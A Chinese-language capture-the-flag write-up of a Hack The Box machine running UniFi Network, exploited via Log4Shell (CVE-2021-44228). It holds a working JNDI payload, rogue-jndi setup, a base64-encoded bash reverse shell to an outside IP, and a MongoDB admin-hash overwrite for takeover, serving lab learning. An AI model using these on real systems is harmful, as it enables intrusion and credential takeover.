在hack the box 玩时碰到个JDNI注入CVE,觉得挺经典的随手记录一篇。也正是去年年底爆出的Apache Log4j远程代码执行漏洞(CVE-2021-44228)。
nmap -sS -Pn -T4 -p1-10000 -A 10.129.105.187
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
6789/tcp open ibm-db2-admin?
8080/tcp open http-proxy
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 431
| Date: Mon, 28 Mar 2022 13:13:43 GMT
| Connection: close
| <html lang="en"><head><title>HTTP Status 404
| Foundtitle><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}style>head><body><h1>HTTP Status 404
| Foundh1>body>html>
| GetRequest, HTTPOptions:
| HTTP/1.1 302
| Location: http://localhost:8080/manage
| Content-Length: 0
| Date: Mon, 28 Mar 2022 13:13:38 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Mon, 28 Mar 2022 13:13:39 GMT
| Connection: close
| <html lang="en"><head><title>HTTP Status 400
| Requesttitle><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}style>head><body><h1>HTTP Status 400
| Requesth1>body>html>
| Socks5:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Mon, 28 Mar 2022 13:13:43 GMT
| Connection: close
| <html lang="en"><head><title>HTTP Status 400
| Requesttitle><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}style>head><body><h1>HTTP Status 400
|_ Requesth1>body>html>
|_http-title: Did not follow redirect to https://10.129.105.187:8443/manage
|_http-open-proxy: Proxy might be redirecting requests
8443/tcp open ssl/nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain;charset=UTF-8).
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
| Not valid before: 2021-12-30T21:37:24
|_Not valid after: 2024-04-03T21:37:24
8843/tcp open ssl/unknown
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Mon, 28 Mar 2022 13:14:03 GMT
| Connection: close
| <html lang="en"><head><title>HTTP Status 400
| Requesttitle><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}style>head><body><h1>HTTP Status 400
| Requesth1>body>html>
| HTTPOptions:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Mon, 28 Mar 2022 13:14:05 GMT
| Connection: close
| <html lang="en"><head><title>HTTP Status 400
| Requesttitle><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}style>head><body><h1>HTTP Status 400
| Requesth1>body>html>
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Mon, 28 Mar 2022 13:14:06 GMT
| Connection: close
| <html lang="en"><head><title>HTTP Status 400
| Requesttitle><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}style>head><body><h1>HTTP Status 400
|_ Requesth1>body>html>
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
| Not valid before: 2021-12-30T21:37:24
|_Not valid after: 2024-04-03T21:37:24
8880/tcp open cddbp-alt?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 431
| Date: Mon, 28 Mar 2022 13:13:39 GMT
| Connection: close
| <html lang="en"><head><title>HTTP Status 404
| Foundtitle><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}style>head><body><h1>HTTP Status 404
| Foundh1>body>html>
| GetRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Mon, 28 Mar 2022 13:13:38 GMT
| Connection: close
| <html lang="en"><head><title>HTTP Status 400
| Requesttitle><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}style>head><body><h1>HTTP Status 400
| Requesth1>body>html>
| HTTPOptions:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Mon, 28 Mar 2022 13:13:45 GMT
| Connection: close
| <html lang="en"><head><title>HTTP Status 400
| Requesttitle><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}style>head><body><h1>HTTP Status 400
|_ Requesth1>body>html>
习惯性先ssh尝试随便输几波弱口令略过,6789浏览器打不开服务未知暂略过,浏览器访问8080被重定向到8443。也就是主角登场:
UniFi NetWork 版本6.4.54,有公开披露 CVE-2021-44228 Apache Log4j远程代码执行漏洞,其实就是JDNI注入吧。
漏洞产生原理具体详情请跳转https://www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi
本靶场漏洞产生于remember 字段。本来想偷懒试试不在本地搭建LDAP服务环境,主要嫌JAVA切换版本太麻烦。后来发现逃不掉。
JNDI服务环境搭建:
git clone https://github.com/veracode-research/rogue-jndi && cd rogue-jndi && mvn package
还要安装maven
sudo apt install maven
mvn package
然后BASE64编码 payload,端口4444看个人喜好,反弹shell回连的端口,工具启动默认会开启8000 http服务与LDAP 1389 服务
echo 'bash -c bash -i >&/dev/tcp/10.10.14.74/4444 0>&1' | base64
使用该 Base64 输出,在 rogue-jndi 中构建命令
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTYvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" --hostname "10.10.14.74"
然后监听本地4444,Burpsuite重新发包即可看到shell回连。
${jndi:ldap://eb0uvi.dnslog.cn:1389/o=tomcat}
升级shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
用户flag到手。
然后顺着官方的问题,发现27117的 MongoDB数据库
ps aux | grep mongo
然后尝试提取管理员密码,发现被加密。但是可通过update更新管理员密码,复制生成
mkpasswd -m sha-512 Password1234
$6$sbnjIZBtmRds.L/E$fEKZhosqeHykiVWT1IBGju43WdVdDauv5RsvIPifi32CC2TTNU8kHOd2ToaW8fIX7XXM8P5Z8j4NB1gJGTONl1
mongo --port 27117 ace --eval 'db.admin.update({"_id":
ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$sbnjIZBtmRds.L/E$fEKZhosqeHykiVWT1IBGju43WdVdDauv5RsvIPifi32CC2TTNU8kHOd2ToaW8fIX7XXM8P5Z8j4NB1gJGTONl1"}})'
然后去web登陆:
然后在设置里找到root的密码:
SSH登陆拿到root flag:
